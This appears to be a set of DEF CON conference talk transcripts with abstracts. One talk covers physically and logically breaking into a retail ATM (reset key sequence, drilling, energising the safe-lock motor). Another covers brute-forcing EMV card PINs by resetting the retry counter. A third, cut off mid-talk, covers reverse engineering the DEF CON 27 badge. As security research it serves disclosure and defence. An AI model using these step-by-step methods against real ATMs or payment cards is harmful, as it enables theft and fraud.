bin. I can see the lock, the electronic safe lock down there. I can also see some wires over far down there. If I turn the Boroscope a little bit, I can see the wire, or I can see the safe switch, the momentary switch, is the word I was looking for. This momentary switch is connected to the door, and the door is pushing it in, and it's basically telling the computer the door is open or closed. Using this wire up away from the momentary switch and across through some portion of the ATM, it finally does surface through this hole up to where the main board is. It comes over to this junction where it's conveniently labeled front, and then it goes on over to the board where it's labeled C and 16. So if I unplug this, the question is, does it fail open or closed? Well, let's do an experiment to find out. I recorded this demo after I had the vault door open and the ATM was all set up and operational. But the results are the same because the door is closed now and the ATM is operational because the door is closed. If I pull a door sensor plug, then the computer should think that the door is open and it should become not operational. So what happens is I pull out the plug and it says the door is open. The ATM is temporarily out of service. But it's not, right? We just saw the doors closed, but this is exactly what we needed in this case. So I pull out the plug, I reboot, and while initializing, we do clear left, right, clear, clear, cancel, and we get to this screen, reset master password. Reset master password, click yes. All right, it reboots one more time. I get here. 55555555 and here I am as an administrator inside the computer. All right, so at least one of you is wondering, what was that QR code back there? Well, it's nothing. I'm not sure why that's there. It does not seem to be something that is, is alterable through the configuration, and it just leads to nothing, a Google search, I guess. I have no idea. All right. So now the passwords reset, I can get to the ATM inside, I can configure it as I wish, but we really need to get into the safe to make this thing fully operational. And, well, see what's in there, right? So how? Well, first things first, what lock is this thing? Back to the boroscope for some recon. I can see the lock, I can see some writing on it. It turns out with a little Googling, I find that all the ATMs, all of this particular type of ATM uses this Lagarde LG basic electronic lock, and this is what it looks like. Now, in 2016 at Defcon 24, Plur did a great talk about side channel attacks on this type of lock. He used the side channel attack to deduce the correct combination of this Sargent and Greenleaf Titan pivot wool. Very similar to the lock that I have, the Lagarde basic, but not exactly the same one. This, however, this YouTube video by EEV blog, attempting the same attack on the Lagarde lock, but without success. So I decided to come up with another way to figure out how these things work. I ordered one, and I also found out that there's another option, which I assume works the same sort of way along the same lines as Plur's attack. This is called a little black box. And this device as well as this Phoenix device, they basically can reset the safe combo. So you take the cord that goes from the, goes into the safe from the keypad and you hook it up to this device. It determines what lock you have hooked up to, and then you click reset. And what it's gonna do now is some sort of an attack against the lock itself. I believe it basically guesses every combination in less than 15 minutes. And once it guesses the combination, I guess somehow it resets it. I really don't know how this thing works. You can only buy this if you're law enforcement or if you own a bank or are a licensed locksmith. So it costs about $3,000 and I don't have that much money, so I need another way. So I take off the cover. We see the circuit board. If you take the circuit board out, then you can see like the lock mechanism with the bolt and the rotation axis of the bolt, the main bolt handle forces down and rotates it in a clockwise direction. There is an anti-force mechanism here. There's a spring and a notch on the lock and the bolt. If you push down too hard, that notch basically engages and you can't push anymore. If we are able to rotate that lock fully clockwise, then we will pull, push that secondary bolt over into the notch, into that linchpin. Now that linchpin will stop the secondary bolt from going over there unless we type in the correct code, which then provides a nine-volt DC charge to the little motor attached to the linchpin. The motor runs, the linchpin is moved and we can open the lock. All right, so now we know how this thing works. Here's a close-up of the DC motor and the linchpin. And again, if we apply a charge to the motor, then it'll open. So basically all the money in this vault, $300,000 potentially is protected by the lack of voltage to this DC motor. So is there a way from the outside of the vault to get voltage to this DC motor without anyone knowing or without destroying the lock or destroying the vault or destroying the case? Let's have a look. This is a short video of the lock in action. Look in the middle of the lock at that linchpin and you'll see after I type in the code, the motor turns, the linchpin goes up, which would allow the bolt to turn and the lock to open. All right, so here's a look at the keypad. And another interesting thought that I had was, you know, there's a lot of space inside this keypad thing that mounts on the front. And it doesn't appear to me just doing some cursory research that there's any encryption of the numbers that are pressed on the keypad as it's being sent into the lock. And so what you see here is a small experiment with an Arduino Nano in which I'm getting keypad presses on the keypad and in recording the key presses into an Arduino Nano and then passing that back on out to the lock. Very interesting research can be done here. I believe this is a successful man in the middle attack against this particular lock. So yeah, moving on from that, we can see that, you know, I wasn't gonna be able to use that attack to get into my safe I had to continue on. Here are the power wires. They pass directly under the circuit board on the door side of the lock. So the metal you see in this picture would be actually against the door. And the lock sits directly behind this keypad. And the keypad is removable. And if we do remove the keypad, we can see through the hole where the wire goes to the lock that it is indeed the back of the lock. And it gives us this little nice landmark to know exactly where on the lock we are because of this little silver, solid silver dowel, I have no idea what it does, why it's there, but it is there and it gives us a landmark. That little red X you see is exactly where those wires are that we need to get access to. All right, so I need the right tool for the job to get access to this, something I've always wanted, an electromagnetic drill press. All right, so you're probably saying, wait a second, this is cheating, right? Well, hear me out, hear me out. I figure if I can just get a visual on those wires from the outside, I can come up with a way to supply current to them. And there just happens to be an existing hole in the door from the factory that allows, you know, for a different orientation of the keypad if you want. The hole is a quarter inch in diameter and it's exactly where I need it to be and it's there from the factory. I need this to be a little bit bigger, but not too much. I went with a half inch carbide bit, so I made the hole diameter a quarter inch bigger. All right. Well, I put this bit in and I get my drill hooked up. Now this drill has a binding capacity of about 3,000 pounds per square inch. It's not going anywhere once you turn it on and the RPMs of this drill is about 1,200 carbide bit, carbide tipped drill bit. Really no match for this safe door. It really only takes a couple of minutes to get in there. It takes me a little bit longer because I'm not exactly sure what the depth is, but suffice to say, I get into the lock without damaging it in any way. And now we can see the wires of interest. And now keep in mind, if I put the keypad back on, our mischief is fully concealed and nobody is the wiser. All right, so the last piece of the puzzle. How do I get power to these wires through this half inch hole without breaking the lock? After a lot of thinking and digging around, I figured out that there's this tool called a puncture probe. It's exactly what I needed. This is how it works. The idea, you retract the probe, the puncture pin, you get the wire in there and you release the pin into the wire and you have connectivity and you can connect a wire down at the base of the probe. So this is kind of what that looks like. I built my own probes because those plastic ones were far too big. So what I'm doing here is I've punctured these wires on my workbench and I'm applying a nine volt charge to them and you can see that it is opening. Again, the problem was that these were way too big for the access port that I had drilled and I certainly didn't want to cheat anymore by making the hole bigger. So I designed something smaller. At the time I used this little piece of wire with a hook on the end. And here you can see that this is what it looks like when it's all set up. I hooked up the nine volt battery and nothing happened. I was a little worried that my nine volt battery was bad so I hooked it up to a DC power supply and I gave it 17 volts just in case it needed a little more extra juice. Here's the full scene when the vault was opened for the first time back in, I believe, the end of March or early April. Yeah, so you can see the scope there and you can see my tool, the tool that I used, the puncture probe. You can see the wire tool that I created, the inside through the boroscope and then here we go, the door is open for the first time and we can see inside. So here's a demo of what just happened. As you can see, the lock is locked as I pushed down on it and attaching the probes and applying voltage and the lock opens. I'm gonna skip forward because I'm running out a little bit running out of time here. So we're just gonna go pass this one to, again, if I put the keep at in place, there's no evidence of intrusion. And as an added bonus, if you wanna go the extra mile, you can cover the access hole with this half inch plastic cover, like barely noticeable, right? Right, all right, so again, not as satisfied with the smaller probe, there must have been a way to do it with a smaller hole. So I started taking these probes apart, I pulled off the plastic sheathing and saw the probe inside. I went and grabbed a stainless steel three mil tube, and I put a little notch in it in the end and heated up the tube to melt into the plastic of the probe. And this is what it looks like when it's all together. And it's a lot smaller, it's 6.2 mil versus 2.9. So a lot smaller, which means I can now do this attack with a much smaller hole. All right, some loose ends quickly. I sent Dorcomba this letter to let them know some pre-disclosure, pre-talk disclosure. I never got any response from this. Here is my email to security.hiosangamerica. I never got a response to this one either. So I got a delivery failure notice instead. As far as the money, there was money in the ATM. I'm a trusted source advice. I am not gonna tell you exactly how much it was. I will not disclose that, but there was enough to pay for the research project and the ATM and a little bit left over. All right, some follow up research. ATM Wi-Fi, really cool, I think. The Vault Lockman in the middle I showed. ATM software modifications we talked about. Maybe the USD and SD card could be fun to mess with. Internal serial comms between the top and the bottom, between the CDU and the computer. Can we capture and replay? How about EPP deconstruction analysis? That warning message we saw. All of those topics I think are fascinating and I will continue research. If anybody else wants to join me, please reach out to me. So in conclusion, no key, no pin, no combo, no problem. Thanks for watching. Have a great day and I hope you have a fabulous DEF CON. Bye bye.
|
Since the late great Barnaby Jack gave us “Jack Potting” in the late 2000s, there have been several talks on ATM network attacks, USB port attacks, and digital locks attacks which apply to several brands of ATM safes. In this session, I’ll discuss and demonstrate how most of these known attack vectors have been remediated, while several fairly simple attacks against the machine and the safe still remain. We’ll dive into how ATMs work, the steps I went through to become a “licenced ATM operator” which enabled my research, and how I identified the vulnerabilities. I’ll show how, with very little technical expertise and 20 minutes, these attacks lead directly past “secure” and allow attackers to collect a lot more than $200. REFERENCES Barnaby Jack - “Jackpotting Automated Teller Machines” - (2010) from DEFCON - https://www.youtube.com/watch?v=FkteGFfvwJ0 Weston Hecker - “Hacking Next-Gen ATM's From Capture to Cashout” - (2016) from DEFCON - https://www.youtube.com/watch?v=1iPAzBcMmqA Trey Keown and Brenda So - “Applied Cash Eviction through ATM Exploitation” (2020) from DEFCON - https://www.youtube.com/watch?v=dJNLBfPo2V8 Triton - “Terminal Communications Protocol And Message Format Specification” (2004) from Complete ATM Services - tinyurl.com/7nf2fdy5 Rocket ATM - “Hyosung ATM Setup Part 1 - Step by Step” (2018) from Rocket ATM - https://www.youtube.com/watch?v=abylmrBkOGM&t=3s Rocket ATM - “Hyosung ATM Setup Part 2 - Step by Step” (2018) from Rocket ATM - https://www.youtube.com/watch?v=IM9ZG46fwL8 Hyosung - “NH2600 Service Manual v1.0” (2013) From Prineta - https://tinyurl.com/c6jd4hd9 Hyosung - “NH2700 Operator Manual v1.2” (2010) From AtmEquipment.com - https://tinyurl.com/rp2cad8
|
10.5446/54234 (DOI)
|
Hello everyone, it's really pleasure to be part of the Avcontain 9. My name is Sabra Dormendoza and I'm a security researcher of MetabaseQ and I'm probably a member of also a lot of FESNIF security team. Today I'm going to talk about the PINAT attack or PINATomani try attack regarding EMV technology. So let's start with the agenda for today. We're going to have an introduction to terminology. Also, we're going to talk about the EMV transaction flow, which basically is how the card data goes from the terminal to the bank institutions and how it's processed. After that, we're going to talk about the inadequate implementation regarding this attack and how someone could exploit it. Finally, we're going to have a demo implementing an internal tool named ALMA. And after that, we're going to have some conclusions regarding this research. Let's analyze some terminology that we're going to use throughout this presentation. Some of them are going to be very important for the demos, for example, or to understand every more in-depth how the issue or how the bad practices are implemented. So let's start with the secure element OSE, which is basically responsible to sign the transaction or to keep the secrets in the card and the physical card to sign the transaction when it's processing it. The CVM is the card holder verification method, which could be different. It could be the U-verified transaction by sign-in it or it could be by PIN entry mode. Also, we have the APDU, the application protocol data unit, is the protocol in charge to communicate or to handle the communication between the card and the terminal. Also, we have the ICC or integrated circuit card. We know these cards as well as smart cards, for example. But we're going to talk specifically to the EMV transactions, that's to be clear. The PRC is the PIN retry counter, one of the most important terms that we're going to use during this presentation. And also the ARC or ARPC authorization response code, how the bank institution responds back to the transaction and to the terminal. The EMV contact payment is one of the most common and secure technology that we implement and use every day to make transactions. Because it implements a secure element, and the secure element is in charge to sign the transactions or to sign the challenge that terminal is sending to the card. Basically, contact payment is when we insert the card into a terminal and we leave it there until the transaction finishes. Sometimes the user will require to insert or to enter the PIN for the transaction, and sometimes it will require to sign a paper to verify the transaction. When the card is inserted into the terminal, it's going to be detected and after that it's going to be resetted. It's going to be the list applications and it's going to be different steps until the transaction is complete. During these steps, one of the most important is if the transaction is going to be processed online or is going to be processed offline mode. It will depend on different factors and of course it's going to depend on the verification method. If we take a look into different details regarding the terminal and card communication, we can see in the protocol phases how this transaction goes through. For example, we have the card authentication, we have the card holder verification method, and also we have the transaction authorization. It's going to be the last phase after the verification in the transaction. When the terminal starts sending comments to the card, the card must answer back for that specific comment. For example, let's say if the terminal sends a comment that is not properly right, the card will answer back that comment wasn't right. The terminal is going to prepare a new comment and send it back to the card. Basically, it's when you are typing something to a terminal and every comment you are getting responds back. It's the same thing with the terminal on the card. It's like sending a comment and getting a response back very quickly. One of the most important parts in this protocol phase is the card holder verification method that we are going to implement for the PINATA attack. Many people think that the communication between the card and the terminal is encrypted, but it's not. They use the ISO 7816, which basically many other technologies use it as well, such as NFC, for example. NFC implements the application APT layer to communicate with the terminal as well. Also, the same technology that we use for our cell phones, this chip that you put in the cell phone, it communicates simply in the same APT layer with the cellular phone. It's not encrypted the communication, but it needs to follow a format. We are going to analyze what is the format, what is the APT command format, and also what is the APT answer format. How they know how to answer back and which format it's going to be. Take a look into the different details and parameters inside of this APT protocol. Let's analyze one of the most important parts in the APT protocol, which are the commands and the responses. Let's start with the APT command, which is a little different from the card response. We have a header and we have a body. The body, we have the length of the command, and also we have the data from the command, or the command basically. The response, we have the data, and we have the trailer. The trailer basically is the status of the previous command from the terminal, which basically tells if the command was executed correctly, or if there is something wrong, and the answer is going to be in the status of this trailer. To have a better idea, let's analyze the APT command sample. This is going to be the first command that the terminal sends to the card. We analyze it separately. We can see what is the class, what is the instruction. We have parameter one, parameter two. We have the command length, and after that we have the command that is going to be sent to the card. In the same way, we have the card response, which basically is the data, and after that is the trailer. In this particular sample, we have the data, and the trailer is going to be 90.00, which basically is that the previous command was executed correctly. To analyze the data, for example, in this response, we need to decode it. To decode this data, we need to use the TLV decoding method, or we can use the emvlab.org decoding tool, which basically you put the APDU, and it's going to break apart each command or each answer that you print the card, which is very straightforward. For this type of response or commands, we can analyze very quickly to see what is inside of the APDU protocol. Very essential to understand the process and to understand the communication between the terminal and the card. As security researcher, sometimes you need to find a way to test some implementations, but sometimes, even when you have the idea, you need to design or create hardware or software, depending on why you want to test. This was the case when we need to design a tool to analyze the APDU protocol between the contact card or the emv card and the terminal, because we know that these are security cards, but one thing is what they mentioned, saying that they are security cards, and another thing very differently is the implementation. So we decided to create or to design the ELMA technology. This ELMA tool is an emv laboratory malware assistant, which basically is what it does. It assists to analyze the emv protocol between the terminal and the card. We're going to go into details about how we design this hardware and what are the capabilities that we have in the laboratory to analyze these technologies. This is the ELMA board. It's based on ZSIMT-RES-2, which is an open hardware project. It's specifically designed for the ZSIMT technologies implemented in the cellular phones of the GSM network. The idea of the ZSIMT-RES-2 is that you can sniff or emulate traffic using the ZSIM adapter on the board, or using the USB cable connected to a client and the computer. On the other hand, the ELMA board is specifically designed using flexible adapters and buttons, but also it has the capability to implement the USB to fit the board or to analyze the traffic between the terminal and the emv card. Also, it's capable to connect to a server implementing the Wi-Fi connectivity using the ESP32, and it helps us a lot in the laboratory to understand the protocol and to understand the features in the emv card. These are some of the characteristics of the ELMA board. We have the USB-C connector, which basically is for flexibility. Also, we have the ESP32 that we implemented for Wi-Fi connectivity to the server or to external server, where we can send data from the board and process an adapter that's sending back to the board, so the board can emulate it directly to the terminal. Of course, we have different adapters to connect, like for example, emv cards or ZSIM cards. We have different modes, that they could be sniffing modes, fosters, or emulation, specifically for a task. Let me show you how it looks, a connection for the sniffing traffic. We have the emv card in one side, and we have the ELMA in the middle. After that, we implement another connector with a physical board that simulates a physical emv card to the terminal, which basically sends the data through the ELMA, and it simulates a transaction, let's say, for example. Basically, this idea is to sniff the traffic from the card to the terminal and read the responses from the card. The idea of seeing the comments from the terminal and seeing the responses from the card is to analyze how they interact with each other. After that, we can analyze the responses and to see if there is something weird during this communication process. Let's analyze the ELMA toolset. ELMA has different capabilities in the client and also in the board. For example, we can use a sniffer or emulator, depending on the task. Let's say, for example, that we want to sniff some traffic. We can run the sniffer platform or the sniffer firmware, or if we want to emulate something, we can use the emulator for that task specifically. Inside of the emulator, we have different features, like men in the middle. The men in the middle can alter the CVM or basically the cardholder verification method. Imagine that we have a list of the cardholder verification method that in this list, depending on the order, it could be the verification method. We can change that implementing this type of men in the middle emulation mode. Also, we can change the terminal comments. We can adapt the card response. One of the most important parts is that we can modify any EMV type value. This is to test the environment, basically. Also, we have APDU Fosser. It's to send random data to the terminal or to the card to see if we can break something. Of course, we have the Pignata attack in these features, which is basically this presentation is based on. Above all of that, we have the option to implement a relay. This means that, for example, we can have the Alma board in one computer, and even the physical card could be in another location. We can extract data from that card, implementing the client for this Alma board. The virtual smart card is the core of the ELMA technology. Basically, I can relate it to a software emulator of a smart card, but you have the capabilities to connect physical card readers to your computer and move the data between these virtual smart card readers, change the data, and send it back. It could be sending back over a relay, for example, or you can send it back locally to another device that is connected to the device. It's very easy to use it, and we implemented a lot in the ELMA design. After we analyzed the APD protocol and how we designed the ELMA prototype or ELMA technology, let me talk a little bit about this in-adoc code implementation to reset the PNRetry counter and the EMV card, so PAN cards. Let's talk a little bit about what is the process in the protocol when a transaction starts in the terminal. Initially, we have the card authentication, after that we have the card holder verification, and then we have the transaction authorization. Let's start with the card authentication. In this step, the terminal starts sending commands to list the applications. Basically, at this point the terminal knows what kind of card you are using. It's a Visa, a MasterCard, an American Express, or something else. In the next step, it's going to be the card holder verification method. It's where the terminal is going to prompt to enter a PIN, or it's going to ask you to sign in the terminal, or it's going to depend on the terminal technology and, of course, comparing to the card technology. All this process is going to finish with the transaction authorization. In this part, the terminal sends all the data to the backend, to the financial institution, and the financial institutions, all the financial institutions sends back the IRC, which basically is the authorization response code. This is applied to the card, and, of course, applied to the transaction. At this point, the transaction can go through, or it could be declined. It's going to depend on all of these forms. Let's focus in on the card holder verification phase, which is one of the important steps in this research. Do you know how many card holder verification methods do we have to make a transaction, for example? Let's focus and read a little bit about how many of these verification methods are available in the backend and the terminal and the card when you're making a transaction. We have a list inside of the card that tells the terminal what kind of verification methods are capable of. Some of them are like NOSVM required, signed in the paper, and then printed spin by ICC, printed spin and paper, also encrypted spin by ICC, or encrypted pin by ICC and change of paper. One of the most important is encrypted pin and its verification online, which is one of the normal verification when you are using an ATM, for example. The verification is encrypted pin and verified online all the time. These are some of the most common card holder verification methods that we use with the transactions. Let's analyze these card response where we need to take a look at the CVM list, especially putting attention to the HE tag value. The first step is to decode it to see how it's implemented or what kind of value the HE tag contains. After we decode it, we can see the card holder verification method list. Inside of the list, we have all the values, all the possibilities that the physical card has to verify a transaction. Specifically, I'm talking about the HE EMV tag. If we split the values, we can understand them individually. Let's do that. We have this list. We are going to separate each value to understand what exactly it means. We have encrypted pin in the first row, a terminal support CVM. The second row is encrypted pin by ICC. The third row is pin by ICC. The next one is the sign. The last one is not CVM required. You can see this list is in order. Do you mind what happens if I flip the values? Let's say if I put the 1F03 on the top of the list. That could be another attack for another research. Let's say we want to be focused on the plain pin by ICC. What this verification method does is that you can verify a pin against the ICC. For example, I want to verify a pin 1, 2, 3, and 4. I can send this 1, 2, 3, and 4 to the card implementing this command. The EMV card has different possibilities to respond. Let's say if that's the right pin, it's going to be a 90 and 00, which is going to be the trail of the EMV card response. But also, they have other options. Like SITS3, C2, which means there is a wrong pin, but you have two more attempts left. After that, it's going to be SITS3, C1, which means there's a wrong pin, and one more attempt left, and SITS3, C0, which means there's a wrong pin, and no more attempts left. So, if you imagine, this is a counter, pin retry counter, which basically accounts how many attempts left inside of the ICC. So, if this counter goes to 0, that means that we don't have any more possibilities to attempt with another pin, which is a mechanism to protect against brute force attacks. So, to be able to send these commands to the EMV card, first of course, the card has to support pain pin by ICC. And the other thing is, if we go through the EMV flow chart, we can see that to send pins to the card, we need to go through the card identification, and after that, we're going to be in the card holder verification. At this point, is where we'll be able to send commands to the card. So, let's say that we start sending to check the retry pin counter, and at this point, the retry pin counter has three more attempts left to try different pins. So, we start sending the pin 0718, and we got the response back, which is 63C2, which basically means it's a wrong pin, and we have two more attempts left. After we sent the last pin, which is going to be the 0720, we can notice that we got the 63Z0, which means the pin retry counter is equal to 0. That means that we don't have more attempts left, and we are not able to try more pins. So, here the question is, how can we reset this pin retry counter to 3 again? We have two common ways to reset the PRC, or the pin retry counter. One of the most common is when you remember the pin, and you can go to any ATM from the financial institution, and when you insert the card to the ATM using the correct pin, the ATM internally is going to run the scripts, specifically to do the card management, and it's going to reset this PRC to the value that it has before. Another way to do it is when the card contains the encryption key and the MACI scripts inside of the card. So, when the terminal basically generates the application cryptogram and responds with the ERQC, basically for online approval, the financial institution is going to respond with the ARPC, which basically is for the approval or rejection of the transaction. But inside of this data, we are going to have the CSU, which basically is the CardStatusUpdate, which contains some data that could update the card internally, which could be a command to reset the PRC specifically. Let's imagine that we have a card, and we already tried three different pins. So, we don't have any more attempts left in the EMV card. That means that we need to try to make a transaction to see if the financial institution resets the pin retry counter. So, how we can do this? We can try to make a transaction with no CVM required, or we can try to make a transaction implementing the signature CVM. We can do this in different ways, but normally like the mobile POS, many of them implement no CVM or signature CVM here in the United States. So, the idea is that after generating the application cryptogram, the financial institution returns the ARPC. We can verify if the pin retry counter is set to three, for example, or to five, depending on the configuration. And we can notice this in the last step of the transaction, when the ARPC is applied to the card. After this step, we can verify if the pin retry counter is set to the previous value, which should be three or five, depending on the implementation. But of course, this is an inadequate implementation, a bad practice to do it. The best way to reset the pin retry counter is by using an ATM in the financial institution, or by calling a representative from the bank, for example, to assign a new pin to the card. And after they use the card in the ATM, they are going to reset the pin retry counter. But doing this type of reset after a transaction, it could be very dangerous. I'm going to show you why. So let's imagine that we have a normal ARC from the bank, which basically I can see some changes between each responses. So this one is a normal transaction when it didn't receive any order to change the pin retry counter. But in this slide, we can see different bytes that I can relate it to the pin retry counter, basically, to change it to the previous value. So to be able to use the pinata tag, the card has to implement two different features. One is the plain pin by IC cardhold verification method, and also the pin retry reset by the user when the PRC is zero. With these two characteristics, we can run the pinata tag against the EMV card. And we are going to show you how I did my setup to do this and to run this pinata tag. To run the pinata tag, we need to make a special LMAG setup project. For this specific case, I'm going to use the GPD pocket 2 small computer or pocket computer. It's one of the most powerful devices in this size specifically to do different things. But you can use any other device that you have available to do this type of setup. Also, we're going to use a cheapest card reader that you can find on the Internet, the SGR3310. Which basically what it's going to do is we're going to extract the original EMV data from this reader. So our financial card is going to be inserted in this reader. So basically with the pocket computer, we're going to start reading the card and we're going to process the data. And after that, we're going to send it to the LMA board. So also we're going to need the LMA board, of course. And we're going to need the sum up payment system. Basically, it's a payment system that you can implement in a cellular phone. So you have an application and you can make payments directly to this device. The idea to have these devices is to be able to control the payment environment basically. So the idea of the LMA at this point is going to simulate a real EMV card to sum up. But it's going to process the data that we are going to extract from the card reader basically. Because we're going to use a mobile payment system and we are going to have this application for the sum up payment system in our cellular phone. We need to implement the Auto Clicker application. The Auto Clicker basically what it's going to do is going to play an important role to help us to automatize different tasks. For example, let's say that we try three different pins and we need to make a new transaction to reset the pin retry counter. So the Auto Clicker is going to do that automatically for us. So that's one of the most important parts in this pinata. So this is my setup. I have the pocket two basically in the middle. We have the card reader SCR3010 from where we are going to extract data, the original data from the card. On the other side we have the LMA board connected by USB. This could be a relay over the internet but for this demo we are using locally connection. The LMA is going to simulate the transaction and implement the connector to the sum up. So when the sum up sends the first comment, the LMA is going to process it, is going to send it to the client in the pocket computer. And the pocket is going to send the last comment to the card. What's going to do in the client side is going to start checking for some kind of flux. Let's say if I activate the pinata attack, it's going to detect when we are going to be in the verification mode. And after that we are going to start making the brute force attack against the pins. After we have a zero on the pin retry counter, we are going to start a new transaction to reset this pin retry counter. And after we have another three attempts on the counter, we are going to start the process again to make the brute force attack against this EMV card. Internally in the computer it's going to be running a virtual card reader which is going to inspect data from the card reader or the physical reader. And it's going to send this data to the LMA board. Basically it's to process the data internally and after that to present this data to a terminal. The idea of implementing virtual card reader is to be able basically to emulate a card reader, but simultaneously to be able to modify data in real time. To visualize the pinata attack, so what it does basically is after a transaction it checks if the plain pin by ICC verification method is available. If it is, it checks the pin retry counter. If it is greater than zero, means that we have possibilities to make a brute force attack. If we couldn't find a pin, basically we repeat this cycle until we get the correct pin. So mentioning this, we can go directly to the demo slide. So first I'm going to run the client software to start to make the first transaction. Here is where the clicker is very handy, so it's going to help a lot with all the transactions that we are going to need. After we made the first transaction we are going to check the pin retry counter to see if it's greater than zero. If it is, we are going to try to brute force the pin, implementing a list of possible pins to try. If we couldn't find a correct pin, we are going to make a new transaction to reset the pin retry counter. And after we reset it, we try to make a brute force attack against the EMV card. If we couldn't find it, we repeat this cycle until we are able to find the correct pin. And in this last try, we will be able to find the correct pin. And it's 0722, which basically is the pin that we can use to make a transaction with a card, basically. At this point, we can use this card in the ATM or to make a purchase in any store, implementing the correct pin. I want to say thank you to these people that helped me a lot in this research, especially the MetaVisQ team for all the details and support. And thank you for being part of TevCon29. Hope you guys keep enjoying this event.
|
A brute force attack is a trial-and-error method used to obtain information such as user passwords or personal identification numbers (PINs). This attack methodology should be impossible to apply to the actual secured EMV bank cards. In this talk, we will analyze how an inadequate implementation could rely on an extreme and sophisticated PIN brute force attack against 10,000 combinations from 4 digit PIN that could affect millions of contact EMV cards.
|
10.5446/54235 (DOI)
|
Hello, welcome to my talk on hacking the DefCon 27 batch. My name is Seth Kintai, my background is hardware and computer security, so this project was a lot of fun for me. I just wanted to give a little background on some of the terminology you'll be using in this presentation. NFMI, Near Field Magnetic Inductions, it's basically using magnetic waves and fields to communicate instead of radio. Magnetic fields decay at a much faster rate than radio does. It passes through body tissues better, so it's better for short distances, for body area networks. The short distance supposedly makes it more secure, it's more efficient. It hasn't been used too much, it basically uses two coils to communicate with each other, sort of like electromagnets or half of a transformer talking to each other instead of using antennas. It's used in proximity cars as part of the NFC protocol, and it's used in some hearing aids and I think some earbuds, but not too many other locations. Maybe they had dreams of putting in Apple earbuds, because I read that somewhere in a blog, but the company was extremely cagey about any sort of information on these chips. There was no data sheet at all, which is bizarre. No info on the protocol, no dev kits, no samples. If you wanted to order anything, you had to order tens or hundreds of thousands and sign an NDA. You just couldn't find any real official info on these chips. Software-defined radio, basically taking all the hardware guts and making them virtual and putting them into software, makes designing new radios and mixing them at arts much easier and more fun. I use GNU radio to do that sort of thing and modulate, demodulate signals, do some other tools for that too. I used hackRF to receive and transmit my signals and tune them. There's no antennas, but I made a bunch of coils just wrapping like electromagnetic wire, and I should probably have some pictures of those online at some point. And use Python for everything else. A few other terms you should know, buffer overflow attack, is how that works. I'm sure most of you are familiar with that. Basically, just blow away everything on the stack and keep on writing until you overwrite the return address and take control of a program. SWD or JTAG, those are different low-level hardware debug interfaces, or like GDB, but super low-level. You can control the clock one cycle at a time. Fun stuff. And then a convolution code, basically error correction code, spreads out bits over multiple symbols to make them more resistant to noise. So the badge is part of a game. They communicate it, the badges communicate with each other, and they make little beeping noises and blink lights when they pair with each other. And then if you paired with a magic badge, it would advance the stage of the game you were in. And there were six stages, and you'd advance once for each of these different magic versions of these flavors of badge. And then once you got all of them, you won by getting a piezoelectric rig roll. And the badges are actually cut from pieces of stone, and there's a great presentation on that, should check out. The badge hardware has an MCU that does most of the work, controls the lights and speakers and whatnot, and talks to the NFMI chip over UART. When the MCU boots up, it loads firmware, and in that firmware, there's a little patch of firmware for the NFMI chip, and it sends that over UART and patches that on boot up. The hardware debug interfaces are labeled in this picture. You can connect by serial and talk to a console that's running on the MCU, or you can connect to SWD and do some really low level debugging. There's no connectors on there. In that picture, there's a connector soldered on to the serial port, but they're just unpopulated connectors for now. You can either solder on a connector or solder wires on directly or use a pressure fitting. The badges communicate in a sort of bizarre way. When the badge MCU wants to transmit 8 bytes, first it adds a D to the beginning, then pads every single 4 bits, every nibble with a D. Then ends it with an ASCII E, sends that over UART, the NFMI chip receives that, immediately strips all of that padding off and transmits it. The receiving badge receives that, puts all that padding back on again, sends it over UART, and then the badge strips it all off again. Early on in the game, I decided to reverse engineer the code that someone had pulled the firmware off the badge, so I reverse engineered it and looked through, and after a few hours of that, someone, I think it was Joe Grant, actually released the source code. There was sort of wasted time, but on the other hand, I'd never actually seen all the correct answers when reverse engineering code before, but it was a new experience. So, I started plugging into Ghidra, it didn't work very well back then, I still don't know if it still does. I ended up using an old version of IDA Pro, and it worked a lot better. While plugging through with IDA, I found a buffer overflow, and it seemed so obvious, I was sure it had to be part of the game. As you can possibly tell from the code, it's basically reading bytes into a buffer until it finds a letter E, and it will read... That buffer is 18 bytes total, but there's no limit at all, just read and read and read and read and read until it finds that E. I made a proof of concept early on, I wanted to make sure this buffer overflow was actually exploitable, so in Notepad, I wrote up some ARM code and just used an online assembler to convert that into machine code. And I wrote this little script here to use a J-Link over SWD, not JTAG, I connected to the badge, loaded my payload into the ring buffer, I set the transmit index and the receive index values, and it's told the badge to run. It thought it had a giant packet, and we'll see what happens. This is the serial console for the badge, I'm telling it to receive a packet. Now I'm going to send it one, a regular valid packet, and that's what it displays. Now I run my hack through J-Link, so now there's an oversized packet sitting in the ring buffer. Next time I tell the badge to receive it, my code takes over, prints hack to plan it on the screen. That worked, so now I just need to figure out how to send a gigantic custom crafted packet. So I dug around online for specs on this chip used on this badge, the NFMI chip, found a few details and good guesses on frequencies and bandwidths, pretty good guess on the modulation from a lot of random sources. I started looking at the signal in analog, first on the top row you see 16 bursts over about 10 seconds. Middle row I have magnified one of those bursts, you can kind of see where the different sections are. The bottom row lets you see the four distinct sections of each burst. Section one seems to be timing pulses, sends the carrier frequency and then one that's 150 MHz higher and then 150 MHz lower. It doesn't seem to be transmitting any data, but it may be doing this just to establish a range of frequency and amplitude of the signal as well as timing. Quick note on down conversion, if you're not familiar with the subject, you're not demodulating the signal, you're not changing it all other than lowering the frequency by multiplying it with another signal. You're trying to think of it like a beat frequency in music. So you're just shifting the signal down from say 10.569 MHz, you're shifting it down to 0 MHz. So now all the energy is around that plus or minus 200,000 KHz. You can see how the signals that were at the carrier frequency are now basically flat lines because they're almost zero. And a whole bunch of squiggles that didn't look much different from each other are now much more clearly data. You can see there's repeating patterns in them. So section two has these patterns that place them twice. Sometimes exact copies, sometimes they're inverted, sometimes they swap places between I and Q. And there's only, I think, eight different patterns it shows. I ended up calling these preambles based on them showing up later in the other packet. Section three just seems to be more timing. I tried my best to get it to be exactly zero hertz and never quite could. And then the frequency would drift, I think, with temperature. I don't really know. And then section four was data. It's 271 copies of the same data packet. Each one starts with eight variations of those preambles you saw in section two are almost exactly that preamble. It's slightly different. And then followed by data and then a brief null or pause. And sometimes they are exact copies of each other. It sometimes are inverted. Sometimes the I and Q swap just like with the preambles in section two. The modulation used is D8PSK. PSK is phase shift keying. It's basically modulating a signal so when you plot it, it shows up as, the burst show up as one of those eight dots on the constellation. You'll actually form that on a plot as long as your timing is right. The eight refers to there being eight points in that constellation and then D means differential. So it's the difference between each point is where your actual data is transmitted. And each of those points is called a symbol. The center frequency seems to move a little bit. In the beginning, I had one frequency that I just 